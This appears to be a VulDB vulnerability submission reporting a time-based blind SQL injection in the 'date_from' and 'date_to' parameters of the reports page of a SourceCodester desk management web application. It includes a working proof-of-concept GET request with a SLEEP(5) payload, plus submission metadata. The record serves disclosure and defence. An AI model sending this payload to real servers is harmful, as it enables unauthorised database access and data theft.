| Title | Student Study Center Desk Management System reports SQL Injection Vulnerability |
|---|
| Description | A SQL Injection Vulnerability has been discovered in Student Study Center Desk Management System's reports function.Remote attackers can send crafted request to the target server to exploit this vulnerability.The vulnerable URI is GET /php-sscdms/admin/?page=reports&date_from=2023-02-17&date_to=2023-03-17 and 'date_from' and 'date_to' are the injectable parameters.
Below is a effective poc using time-based blind injection
GET /php-sscdms/admin/?page=reports&date_from=2023-02-17&date_to=2023-03-17' AND (SELECT 2100 FROM (SELECT(SLEEP(5)))FWlC) AND 'bvcx'='bvcx HTTP/1.1
The server will response after 5s, which can prove the injection |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/17/2023 10:36 (3 years ago) |
|---|
| Moderation | 03/17/2023 12:44 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223327 [SourceCodester Student Study Center Desk Management System 1.0 Report date_from/date_to sql injection] |
|---|
| Points | 20 |
|---|